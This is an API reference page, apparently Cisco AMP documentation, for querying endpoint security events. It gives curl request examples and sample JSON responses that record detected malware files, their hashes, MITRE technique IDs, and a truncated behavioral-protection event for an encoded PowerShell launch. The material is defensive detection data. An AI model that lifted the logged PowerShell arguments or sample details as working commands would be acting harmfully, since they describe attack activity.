GET /v0/events
Description
This is a general query interface for events. This is analogous to the Events view on the FireAMP Console.
Events can be filtered by a variety of criteria. Each criteria type is logically ANDed with the other criteria; each selection of a criteria is logically ORed. For example: with the query string: connector_guid[]=ead39d47-93bd-4230-b692-454b433faf96&event_type[]=2164260868&event_type[]=1090519054
, it will return any events that match the connector guid ad39d47-93bd-4230-b692-454b433faf96 AND any events with type (1090519054 OR 2164260868).
The arguments passed to the event_type
and group_guid
parameters can be retrieved from their respective endpoints.
Query Parameters
Name | Type | Example Values | Description |
---|---|---|---|
detection_sha256 |
String | f8a6a244138cb1e2f044f63f3dc42beeb555da892bbd7a121274498cbdfc9ad5 | |
application_sha256 |
String | 80ef843fa78c33b511394a9c7535a9cbace1deb2270e86ee4ad2faffa5b1e7d2 | |
limit |
Integer | 1, 2, 10 | |
connector_guid[] |
GUID | af73d9d5-ddc5-4c93-9c6d-d5e6b5c5eb01 | |
group_guid[] |
GUID | b077d6bc-bbdf-42f7-8838-a06053fbd98a | |
start_date |
String (Time ISO8601) | 2015-10-01T00:00:00+00:00 | Inclusive (The list will include events that match start_date) |
offset |
Integer | 10 | |
event_type[] |
Array | 1090519054, 1090519084 |
Name | Type | Description |
---|---|---|
version | String | |
metadata.links.self | String | |
metadata.links.prev | String | |
metadata.links.next | String | |
metadata.results.total | Integer | |
metadata.results.current_item_count | Integer | |
metadata.results.index | Integer | |
metadata.results.items_per_page | Integer | |
data | Array | |
data[].id | Integer | |
data[].timestamp | Integer | |
data[].timestamp_nanoseconds | Integer | |
data[].date | String (Time ISO8601) | |
data[].event_type | String | |
data[].event_type_id | Integer | |
data[].detection | String | |
data[].detection_id | String | |
data[].group_guids | Array | |
data[].group_guids[] | GUID | |
data[].computer.connector_guid | GUID | |
data[].computer.hostname | String | |
data[].computer.external_ip | String | |
data[].computer.user | String | |
data[].computer.active | Boolean | |
data[].computer.network_addresses | Array | |
data[].computer.network_addresses[].ip | String | |
data[].computer.network_addresses[].mac | String | |
data[].computer.links.computer | String | |
data[].computer.links.trajectory | String | |
data[].computer.links.group | String | |
data[].file.disposition | String | |
data[].file.file_name | String | |
data[].file.file_path | String | |
data[].file.identity.sha256 | String | |
data[].file.identity.sha1 | String | |
data[].file.identity.md5 | String | |
data[].file.parent.process_id | Integer | |
data[].file.parent.disposition | String | |
data[].file.parent.file_name | String | |
data[].file.parent.identity.sha256 | String | |
data[].file.parent.identity.sha1 | String | |
data[].file.parent.identity.md5 | String |
Examples
- Fetch list of events sorted in descending order by timestamp
- Fetch list of events filtered by connector_guid
- Fetch list of events filtered by group_guid
- Fetch list of events filtered by detection_sha256 and application_sha256
- Fetch list of events filtered by event_type
- Fetch list of Behavioral Protection Detection events
- Fetch events that are newer than a given timestamp
- Fetch list of events filtered by SCAN_STARTED event type
Fetch list of events sorted in descending order by timestamp
Request
Requires AuthorizationGET /v0/events?limit=2
Headers
accept: application/json
content-type: application/json
accept-encoding: identity
authorization: Basic FILTERED
cURL Edit, then copy and paste on your terminal
curl -X GET \
-H 'accept: application/json' \
-H 'content-type: application/json' \
-H 'accept-encoding: identity' \
--compressed -H 'Accept-Encoding: gzip, deflate' \
-u YOUR_API_CLIENT_ID \
'https://api.consumer.amp.cisco.com/v0/events?limit=2'
Response
cURL Edit, then copy and paste on your terminal
curl -X GET \ -H 'accept: application/json' \ -H 'content-type: application/json' \ -H 'accept-encoding: identity' \ --compressed -H 'Accept-Encoding: gzip, deflate' \ -u YOUR_API_CLIENT_ID \ 'https://api.consumer.amp.cisco.com/v0/events?limit=2'
Shortened for readability
content-type: application/json transfer-encoding: chunked status: 200 OK x-ratelimit-limit: 3000 x-ratelimit-reset: 885 strict-transport-security: max-age=31536000; includeSubDomains, max-age=31536000 referrer-policy: strict-origin-when-cross-origin x-ratelimit-remaining: 2825 x-permitted-cross-domain-policies: none x-download-options: noopen etag: W/"491b4ecf936933a7de3aa4e55f67d031" x-frame-options: SAMEORIGIN x-ratelimit-resetdate: 2022-03-18T11:55:11Z
{
"version": "v0.2.2",
"metadata": {
"links": {
"self": "https://api.consumer.amp.cisco.com/v0/events?limit=2",
"next": "https://api.consumer.amp.cisco.com/v0/events?limit=2&offset=2"
},
"results": {
"total": 1165,
"current_item_count": 2,
"index": 0,
"items_per_page": 2
}
},
"data": [
{
"id": 6180352115244794000,
"timestamp": 1647602438,
"timestamp_nanoseconds": 279000000,
"date": "2022-03-18T11:20:38+00:00",
"event_type": "Threat Detected",
"event_type_id": 1090519054,
"detection": "W32.GenericKD:ZVETJ.18gs.1201",
"detection_id": "6180352115244793858",
"connector_guid": "538738f5-3a14-4449-933b-86142553de06",
"group_guids": [
"e766a0e9-96da-41b9-b1e8-87dd010d6b68"
],
"severity": "Medium",
"computer": {
"connector_guid": "538738f5-3a14-4449-933b-86142553de06",
"hostname": "Demo_Upatre",
"external_ip": "167.151.184.100",
"user": "A@TEMPLATE-W7X86",
"active": true,
"network_addresses": [
{
"ip": "72.89.178.75",
"mac": "60:60:24:d4:97:1c"
}
],
"links": {
"computer": "https://api.consumer.amp.cisco.com/v0/computers/538738f5-3a14-4449-933b-86142553de06",
"trajectory": "https://api.consumer.amp.cisco.com/v0/computers/538738f5-3a14-4449-933b-86142553de06/trajectory",
"group": "https://api.consumer.amp.cisco.com/v0/groups/b077d6bc-bbdf-42f7-8838-a06053fbd98a"
}
},
"file": {
"disposition": "Malicious",
"file_name": "wsymqyv90.exe",
"file_path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe",
"identity": {
"sha256": "b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40",
"sha1": "70aef829bec17195e6c8ec0e6cba0ed39f97ba48",
"md5": "e2f5dcd966e26d54329e8d79c7201652"
},
"parent": {
"process_id": 4040,
"disposition": "Clean",
"file_name": "iexplore.exe",
"identity": {
"sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132",
"sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80",
"md5": "b3581f426dc500a51091cdd5bacf0454"
}
}
},
"tactics": [
"TA0042"
],
"techniques": [
"T1204.003"
]
},
{
"id": 6180351977805840000,
"timestamp": 1647602406,
"timestamp_nanoseconds": 548000000,
"date": "2022-03-18T11:20:06+00:00",
"event_type": "Threat Detected",
"event_type_id": 1090519054,
"detection": "W32.GenericKD:ZVETJ.18gs.1201",
"detection_id": "6180351977805840385",
"connector_guid": "538738f5-3a14-4449-933b-86142553de06",
"group_guids": [
"e766a0e9-96da-41b9-b1e8-87dd010d6b68"
],
"severity": "Medium",
"computer": {
"connector_guid": "538738f5-3a14-4449-933b-86142553de06",
"hostname": "Demo_Upatre",
"external_ip": "167.151.184.100",
"user": "A@TEMPLATE-W7X86",
"active": true,
"network_addresses": [
{
"ip": "72.89.178.75",
"mac": "60:60:24:d4:97:1c"
}
],
"links": {
"computer": "https://api.consumer.amp.cisco.com/v0/computers/538738f5-3a14-4449-933b-86142553de06",
"trajectory": "https://api.consumer.amp.cisco.com/v0/computers/538738f5-3a14-4449-933b-86142553de06/trajectory",
"group": "https://api.consumer.amp.cisco.com/v0/groups/b077d6bc-bbdf-42f7-8838-a06053fbd98a"
}
},
"file": {
"disposition": "Malicious",
"file_name": "wsymqyv90.exe",
"file_path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe",
"identity": {
"sha256": "b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40",
"sha1": "70aef829bec17195e6c8ec0e6cba0ed39f97ba48",
"md5": "e2f5dcd966e26d54329e8d79c7201652"
},
"parent": {
"process_id": 4040,
"disposition": "Clean",
"file_name": "iexplore.exe",
"identity": {
"sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132",
"sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80",
"md5": "b3581f426dc500a51091cdd5bacf0454"
}
}
},
"tactics": [
"TA0042"
],
"techniques": [
"T1204.003"
]
}
]
}
Fetch list of events filtered by connector_guid
Request
Requires AuthorizationGET /v0/events?connector_guid%5B%5D=538738f5-3a14-4449-933b-86142553de06&limit=1
Headers
accept: application/json
content-type: application/json
accept-encoding: identity
authorization: Basic FILTERED
cURL Edit, then copy and paste on your terminal
curl -X GET \
-H 'accept: application/json' \
-H 'content-type: application/json' \
-H 'accept-encoding: identity' \
--compressed -H 'Accept-Encoding: gzip, deflate' \
-u YOUR_API_CLIENT_ID \
'https://api.consumer.amp.cisco.com/v0/events?connector_guid%5B%5D=538738f5-3a14-4449-933b-86142553de06&limit=1'
Response
cURL Edit, then copy and paste on your terminal
curl -X GET \ -H 'accept: application/json' \ -H 'content-type: application/json' \ -H 'accept-encoding: identity' \ --compressed -H 'Accept-Encoding: gzip, deflate' \ -u YOUR_API_CLIENT_ID \ 'https://api.consumer.amp.cisco.com/v0/events?connector_guid%5B%5D=538738f5-3a14-4449-933b-86142553de06&limit=1'
Shortened for readability
content-type: application/json transfer-encoding: chunked status: 200 OK x-ratelimit-limit: 3000 x-ratelimit-reset: 884 strict-transport-security: max-age=31536000; includeSubDomains, max-age=31536000 referrer-policy: strict-origin-when-cross-origin x-ratelimit-remaining: 2824 x-permitted-cross-domain-policies: none x-download-options: noopen etag: W/"0c03fe5adb1c02f797d7b071f8428949" x-frame-options: SAMEORIGIN x-ratelimit-resetdate: 2022-03-18T11:55:11Z
{
"version": "v0.2.2",
"metadata": {
"links": {
"self": "https://api.consumer.amp.cisco.com/v0/events?connector_guid%5B%5D=538738f5-3a14-4449-933b-86142553de06&limit=1",
"next": "https://api.consumer.amp.cisco.com/v0/events?connector_guid%5B%5D=538738f5-3a14-4449-933b-86142553de06&limit=1&offset=1"
},
"results": {
"total": 34,
"current_item_count": 1,
"index": 0,
"items_per_page": 1
}
},
"data": [
{
"id": 6180352115244794000,
"timestamp": 1647602438,
"timestamp_nanoseconds": 279000000,
"date": "2022-03-18T11:20:38+00:00",
"event_type": "Threat Detected",
"event_type_id": 1090519054,
"detection": "W32.GenericKD:ZVETJ.18gs.1201",
"detection_id": "6180352115244793858",
"connector_guid": "538738f5-3a14-4449-933b-86142553de06",
"group_guids": [
"e766a0e9-96da-41b9-b1e8-87dd010d6b68"
],
"severity": "Medium",
"computer": {
"connector_guid": "538738f5-3a14-4449-933b-86142553de06",
"hostname": "Demo_Upatre",
"external_ip": "167.151.184.100",
"user": "A@TEMPLATE-W7X86",
"active": true,
"network_addresses": [
{
"ip": "72.89.178.75",
"mac": "60:60:24:d4:97:1c"
}
],
"links": {
"computer": "https://api.consumer.amp.cisco.com/v0/computers/538738f5-3a14-4449-933b-86142553de06",
"trajectory": "https://api.consumer.amp.cisco.com/v0/computers/538738f5-3a14-4449-933b-86142553de06/trajectory",
"group": "https://api.consumer.amp.cisco.com/v0/groups/b077d6bc-bbdf-42f7-8838-a06053fbd98a"
}
},
"file": {
"disposition": "Malicious",
"file_name": "wsymqyv90.exe",
"file_path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe",
"identity": {
"sha256": "b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40",
"sha1": "70aef829bec17195e6c8ec0e6cba0ed39f97ba48",
"md5": "e2f5dcd966e26d54329e8d79c7201652"
},
"parent": {
"process_id": 4040,
"disposition": "Clean",
"file_name": "iexplore.exe",
"identity": {
"sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132",
"sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80",
"md5": "b3581f426dc500a51091cdd5bacf0454"
}
}
},
"tactics": [
"TA0042"
],
"techniques": [
"T1204.003"
]
}
]
}
Fetch list of events filtered by group_guid
Request
Requires AuthorizationGET /v0/events?group_guid%5B%5D=e766a0e9-96da-41b9-b1e8-87dd010d6b68&limit=1
Headers
accept: application/json
content-type: application/json
accept-encoding: identity
authorization: Basic FILTERED
cURL Edit, then copy and paste on your terminal
curl -X GET \
-H 'accept: application/json' \
-H 'content-type: application/json' \
-H 'accept-encoding: identity' \
--compressed -H 'Accept-Encoding: gzip, deflate' \
-u YOUR_API_CLIENT_ID \
'https://api.consumer.amp.cisco.com/v0/events?group_guid%5B%5D=e766a0e9-96da-41b9-b1e8-87dd010d6b68&limit=1'
Response
cURL Edit, then copy and paste on your terminal
curl -X GET \ -H 'accept: application/json' \ -H 'content-type: application/json' \ -H 'accept-encoding: identity' \ --compressed -H 'Accept-Encoding: gzip, deflate' \ -u YOUR_API_CLIENT_ID \ 'https://api.consumer.amp.cisco.com/v0/events?group_guid%5B%5D=e766a0e9-96da-41b9-b1e8-87dd010d6b68&limit=1'
Shortened for readability
content-type: application/json transfer-encoding: chunked status: 200 OK x-ratelimit-limit: 3000 x-ratelimit-reset: 883 strict-transport-security: max-age=31536000; includeSubDomains, max-age=31536000 referrer-policy: strict-origin-when-cross-origin x-ratelimit-remaining: 2823 x-permitted-cross-domain-policies: none x-download-options: noopen etag: W/"3b0a203257835ee3a4810a1f00d7c603" x-frame-options: SAMEORIGIN x-ratelimit-resetdate: 2022-03-18T11:55:11Z
{
"version": "v0.2.2",
"metadata": {
"links": {
"self": "https://api.consumer.amp.cisco.com/v0/events?group_guid%5B%5D=e766a0e9-96da-41b9-b1e8-87dd010d6b68&limit=1",
"next": "https://api.consumer.amp.cisco.com/v0/events?group_guid%5B%5D=e766a0e9-96da-41b9-b1e8-87dd010d6b68&limit=1&offset=1"
},
"results": {
"total": 279,
"current_item_count": 1,
"index": 0,
"items_per_page": 1
}
},
"data": [
{
"id": 6180352115244794000,
"timestamp": 1647602438,
"timestamp_nanoseconds": 279000000,
"date": "2022-03-18T11:20:38+00:00",
"event_type": "Threat Detected",
"event_type_id": 1090519054,
"detection": "W32.GenericKD:ZVETJ.18gs.1201",
"detection_id": "6180352115244793858",
"connector_guid": "538738f5-3a14-4449-933b-86142553de06",
"group_guids": [
"e766a0e9-96da-41b9-b1e8-87dd010d6b68"
],
"severity": "Medium",
"computer": {
"connector_guid": "538738f5-3a14-4449-933b-86142553de06",
"hostname": "Demo_Upatre",
"external_ip": "167.151.184.100",
"user": "A@TEMPLATE-W7X86",
"active": true,
"network_addresses": [
{
"ip": "72.89.178.75",
"mac": "60:60:24:d4:97:1c"
}
],
"links": {
"computer": "https://api.consumer.amp.cisco.com/v0/computers/538738f5-3a14-4449-933b-86142553de06",
"trajectory": "https://api.consumer.amp.cisco.com/v0/computers/538738f5-3a14-4449-933b-86142553de06/trajectory",
"group": "https://api.consumer.amp.cisco.com/v0/groups/b077d6bc-bbdf-42f7-8838-a06053fbd98a"
}
},
"file": {
"disposition": "Malicious",
"file_name": "wsymqyv90.exe",
"file_path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe",
"identity": {
"sha256": "b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40",
"sha1": "70aef829bec17195e6c8ec0e6cba0ed39f97ba48",
"md5": "e2f5dcd966e26d54329e8d79c7201652"
},
"parent": {
"process_id": 4040,
"disposition": "Clean",
"file_name": "iexplore.exe",
"identity": {
"sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132",
"sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80",
"md5": "b3581f426dc500a51091cdd5bacf0454"
}
}
},
"tactics": [
"TA0042"
],
"techniques": [
"T1204.003"
]
}
]
}
Fetch list of events filtered by detection_sha256 and application_sha256
Request
Requires AuthorizationGET /v0/events?detection_sha256=b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40&application_sha256=b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132&limit=1
Headers
accept: application/json
content-type: application/json
accept-encoding: identity
authorization: Basic FILTERED
cURL Edit, then copy and paste on your terminal
curl -X GET \
-H 'accept: application/json' \
-H 'content-type: application/json' \
-H 'accept-encoding: identity' \
--compressed -H 'Accept-Encoding: gzip, deflate' \
-u YOUR_API_CLIENT_ID \
'https://api.consumer.amp.cisco.com/v0/events?detection_sha256=b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40&application_sha256=b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132&limit=1'
Response
cURL Edit, then copy and paste on your terminal
curl -X GET \ -H 'accept: application/json' \ -H 'content-type: application/json' \ -H 'accept-encoding: identity' \ --compressed -H 'Accept-Encoding: gzip, deflate' \ -u YOUR_API_CLIENT_ID \ 'https://api.consumer.amp.cisco.com/v0/events?detection_sha256=b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40&application_sha256=b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132&limit=1'
Shortened for readability
content-type: application/json transfer-encoding: chunked status: 200 OK x-ratelimit-limit: 3000 x-ratelimit-reset: 882 strict-transport-security: max-age=31536000; includeSubDomains, max-age=31536000 referrer-policy: strict-origin-when-cross-origin x-ratelimit-remaining: 2822 x-permitted-cross-domain-policies: none x-download-options: noopen etag: W/"323d38b9e77e8b2408cdd12058712394" x-frame-options: SAMEORIGIN x-ratelimit-resetdate: 2022-03-18T11:55:11Z
{
"version": "v0.2.2",
"metadata": {
"links": {
"self": "https://api.consumer.amp.cisco.com/v0/events?detection_sha256=b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40&application_sha256=b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132&limit=1",
"next": "https://api.consumer.amp.cisco.com/v0/events?detection_sha256=b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40&application_sha256=b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132&limit=1&offset=1"
},
"results": {
"total": 2,
"current_item_count": 1,
"index": 0,
"items_per_page": 1
}
},
"data": [
{
"id": 6180352115244794000,
"timestamp": 1647602438,
"timestamp_nanoseconds": 279000000,
"date": "2022-03-18T11:20:38+00:00",
"event_type": "Threat Detected",
"event_type_id": 1090519054,
"detection": "W32.GenericKD:ZVETJ.18gs.1201",
"detection_id": "6180352115244793858",
"connector_guid": "538738f5-3a14-4449-933b-86142553de06",
"group_guids": [
"e766a0e9-96da-41b9-b1e8-87dd010d6b68"
],
"severity": "Medium",
"computer": {
"connector_guid": "538738f5-3a14-4449-933b-86142553de06",
"hostname": "Demo_Upatre",
"external_ip": "167.151.184.100",
"user": "A@TEMPLATE-W7X86",
"active": true,
"network_addresses": [
{
"ip": "72.89.178.75",
"mac": "60:60:24:d4:97:1c"
}
],
"links": {
"computer": "https://api.consumer.amp.cisco.com/v0/computers/538738f5-3a14-4449-933b-86142553de06",
"trajectory": "https://api.consumer.amp.cisco.com/v0/computers/538738f5-3a14-4449-933b-86142553de06/trajectory",
"group": "https://api.consumer.amp.cisco.com/v0/groups/b077d6bc-bbdf-42f7-8838-a06053fbd98a"
}
},
"file": {
"disposition": "Malicious",
"file_name": "wsymqyv90.exe",
"file_path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe",
"identity": {
"sha256": "b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40",
"sha1": "70aef829bec17195e6c8ec0e6cba0ed39f97ba48",
"md5": "e2f5dcd966e26d54329e8d79c7201652"
},
"parent": {
"process_id": 4040,
"disposition": "Clean",
"file_name": "iexplore.exe",
"identity": {
"sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132",
"sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80",
"md5": "b3581f426dc500a51091cdd5bacf0454"
}
}
},
"tactics": [
"TA0042"
],
"techniques": [
"T1204.003"
]
}
]
}
Fetch list of events filtered by event_type
Request
Requires AuthorizationGET /v0/events?event_type%5B%5D=1090519054&event_type%5B%5D=1090519084&offset=10&limit=10
Headers
accept: application/json
content-type: application/json
accept-encoding: identity
authorization: Basic FILTERED
cURL Edit, then copy and paste on your terminal
curl -X GET \
-H 'accept: application/json' \
-H 'content-type: application/json' \
-H 'accept-encoding: identity' \
--compressed -H 'Accept-Encoding: gzip, deflate' \
-u YOUR_API_CLIENT_ID \
'https://api.consumer.amp.cisco.com/v0/events?event_type%5B%5D=1090519054&event_type%5B%5D=1090519084&offset=10&limit=10'
Response
cURL Edit, then copy and paste on your terminal
curl -X GET \ -H 'accept: application/json' \ -H 'content-type: application/json' \ -H 'accept-encoding: identity' \ --compressed -H 'Accept-Encoding: gzip, deflate' \ -u YOUR_API_CLIENT_ID \ 'https://api.consumer.amp.cisco.com/v0/events?event_type%5B%5D=1090519054&event_type%5B%5D=1090519084&offset=10&limit=10'
Shortened for readability
content-type: application/json transfer-encoding: chunked status: 200 OK x-ratelimit-limit: 3000 x-ratelimit-reset: 882 strict-transport-security: max-age=31536000; includeSubDomains, max-age=31536000 referrer-policy: strict-origin-when-cross-origin x-ratelimit-remaining: 2821 x-permitted-cross-domain-policies: none x-download-options: noopen etag: W/"13adbdaf40e33151322b027671f737d4" x-frame-options: SAMEORIGIN x-ratelimit-resetdate: 2022-03-18T11:55:11Z
{
"version": "v0.2.2",
"metadata": {
"links": {
"self": "https://api.consumer.amp.cisco.com/v0/events?event_type%5B%5D=1090519054&event_type%5B%5D=1090519084&offset=10&limit=10",
"prev": "https://api.consumer.amp.cisco.com/v0/events?event_type%5B%5D=1090519054&event_type%5B%5D=1090519084&limit=10&offset=0",
"next": "https://api.consumer.amp.cisco.com/v0/events?event_type%5B%5D=1090519054&event_type%5B%5D=1090519084&limit=10&offset=20"
},
"results": {
"total": 744,
"current_item_count": 10,
"index": 10,
"items_per_page": 10
}
},
"data": [
{
"id": 6533671385032557000,
"timestamp": 1647599259,
"timestamp_nanoseconds": 14000000,
"date": "2022-03-18T10:27:39+00:00",
"event_type": "Threat Detected",
"event_type_id": 1090519054,
"detection": "W32.File.MalParent",
"detection_id": "6533671380737589309",
"connector_guid": "d06e9b84-7ce3-42a2-bc1c-2480fa1c81ca",
"group_guids": [
"6a208a97-badf-4296-87c2-40779ffff0af"
],
"severity": "Medium",
"computer": {
"connector_guid": "d06e9b84-7ce3-42a2-bc1c-2480fa1c81ca",
"hostname": "Demo_AMP_Threat_Audit",
"external_ip": "149.20.236.110",
"user": "johndoe",
"active": true,
"network_addresses": [
{
"ip": "237.160.117.93",
"mac": "b9:f4:70:d0:30:68"
}
],
"links": {
"computer": "https://api.consumer.amp.cisco.com/v0/computers/d06e9b84-7ce3-42a2-bc1c-2480fa1c81ca",
"trajectory": "https://api.consumer.amp.cisco.com/v0/computers/d06e9b84-7ce3-42a2-bc1c-2480fa1c81ca/trajectory",
"group": "https://api.consumer.amp.cisco.com/v0/groups/6c3c2005-4c74-4ba7-8dbb-c4d5b6bafe03"
}
},
"file": {
"disposition": "Malicious",
"file_name": "ekjrngjker.exe",
"file_path": "C:\\ekjrngjker.exe",
"identity": {
"sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
"sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
"md5": "b99e0a8c56f963246b6464b9fffbf7a2"
}
},
"tactics": [
"TA0042"
],
"techniques": [
"T1204.003"
]
},
{
"id": 6533671380737589000,
"timestamp": 1647599258,
"timestamp_nanoseconds": 605000000,
"date": "2022-03-18T10:27:38+00:00",
"event_type": "Threat Detected",
"event_type_id": 1090519054,
"detection": "W32.File.MalParent",
"detection_id": "6533671380737589308",
"connector_guid": "d06e9b84-7ce3-42a2-bc1c-2480fa1c81ca",
"group_guids": [
"6a208a97-badf-4296-87c2-40779ffff0af"
],
"severity": "Medium",
"computer": {
"connector_guid": "d06e9b84-7ce3-42a2-bc1c-2480fa1c81ca",
"hostname": "Demo_AMP_Threat_Audit",
"external_ip": "149.20.236.110",
"user": "johndoe",
"active": true,
"network_addresses": [
{
"ip": "237.160.117.93",
"mac": "b9:f4:70:d0:30:68"
}
],
"links": {
"computer": "https://api.consumer.amp.cisco.com/v0/computers/d06e9b84-7ce3-42a2-bc1c-2480fa1c81ca",
"trajectory": "https://api.consumer.amp.cisco.com/v0/computers/d06e9b84-7ce3-42a2-bc1c-2480fa1c81ca/trajectory",
"group": "https://api.consumer.amp.cisco.com/v0/groups/6c3c2005-4c74-4ba7-8dbb-c4d5b6bafe03"
}
},
"file": {
"disposition": "Malicious",
"file_name": "ekjrngjker.exe",
"file_path": "C:\\ekjrngjker.exe",
"identity": {
"sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
"sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
"md5": "b99e0a8c56f963246b6464b9fffbf7a2"
}
},
"tactics": [
"TA0042"
],
"techniques": [
"T1204.003"
]
}
]
}
Fetch list of Behavioral Protection Detection events
Request
Requires AuthorizationGET /v0/events?event_type%5B%5D=553648222&limit=2
Headers
accept: application/json
content-type: application/json
accept-encoding: identity
authorization: Basic FILTERED
cURL Edit, then copy and paste on your terminal
curl -X GET \
-H 'accept: application/json' \
-H 'content-type: application/json' \
-H 'accept-encoding: identity' \
--compressed -H 'Accept-Encoding: gzip, deflate' \
-u YOUR_API_CLIENT_ID \
'https://api.consumer.amp.cisco.com/v0/events?event_type%5B%5D=553648222&limit=2'
Response
cURL Edit, then copy and paste on your terminal
curl -X GET \ -H 'accept: application/json' \ -H 'content-type: application/json' \ -H 'accept-encoding: identity' \ --compressed -H 'Accept-Encoding: gzip, deflate' \ -u YOUR_API_CLIENT_ID \ 'https://api.consumer.amp.cisco.com/v0/events?event_type%5B%5D=553648222&limit=2'
Shortened for readability
content-type: application/json transfer-encoding: chunked status: 200 OK x-ratelimit-limit: 3000 x-ratelimit-reset: 882 strict-transport-security: max-age=31536000; includeSubDomains, max-age=31536000 referrer-policy: strict-origin-when-cross-origin x-ratelimit-remaining: 2820 x-permitted-cross-domain-policies: none x-download-options: noopen etag: W/"120bbb85c64f6158c1f1006717a4e389" x-frame-options: SAMEORIGIN x-ratelimit-resetdate: 2022-03-18T11:55:11Z
{
"version": "v0.2.2",
"metadata": {
"links": {
"self": "https://api.consumer.amp.cisco.com/v0/events?event_type%5B%5D=553648222&limit=2",
"next": "https://api.consumer.amp.cisco.com/v0/events?event_type%5B%5D=553648222&limit=2&offset=2"
},
"results": {
"total": 32,
"current_item_count": 2,
"index": 0,
"items_per_page": 2
}
},
"data": [
{
"id": 6880683125978957000,
"timestamp": 1647533684,
"timestamp_nanoseconds": 810000000,
"date": "2022-03-17T16:14:44+00:00",
"event_type": "Threat Detection",
"event_type_id": 553648222,
"detection": "WMIPRVSE Launched Encoded Powershell Command",
"connector_guid": "f3185c52-4903-41da-a833-04a534460eb3",
"group_guids": [
"3aef61ae-a41f-4a89-a47d-1ce96164eea8"
],
"severity": "Medium",
"computer": {
"connector_guid": "f3185c52-4903-41da-a833-04a534460eb3",
"hostname": "Demo_BP_WMIPRVSE",
"external_ip": "234.38.52.99",
"active": true,
"network_addresses": [
{
"ip": "157.184.70.94",
"mac": "67:71:7f:26:b1:5f"
}
],
"links": {
"computer": "https://api.consumer.amp.cisco.com/v0/computers/f3185c52-4903-41da-a833-04a534460eb3",
"trajectory": "https://api.consumer.amp.cisco.com/v0/computers/f3185c52-4903-41da-a833-04a534460eb3/trajectory",
"group": "https://api.consumer.amp.cisco.com/v0/groups/b077d6bc-bbdf-42f7-8838-a06053fbd98a"
}
},
"tactics": [
"TA0002",
"TA0005"
],
"bp_data": {
"audit": false,
"details": {
"actions": [
{
"action": "end_process",
"end_ts": 1602033881808,
"params": [
"10724"
],
"start_ts": 1602033881805,
"status": "success"
}
],
"eng_epoch": 1,
"eng_ver": "0.9.0.104",
"matched_activity": {
"events": [
{
"process:start": {
"app": "powershell.exe",
"app_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"args": [
"powershell.exe",
"-NoP"
],
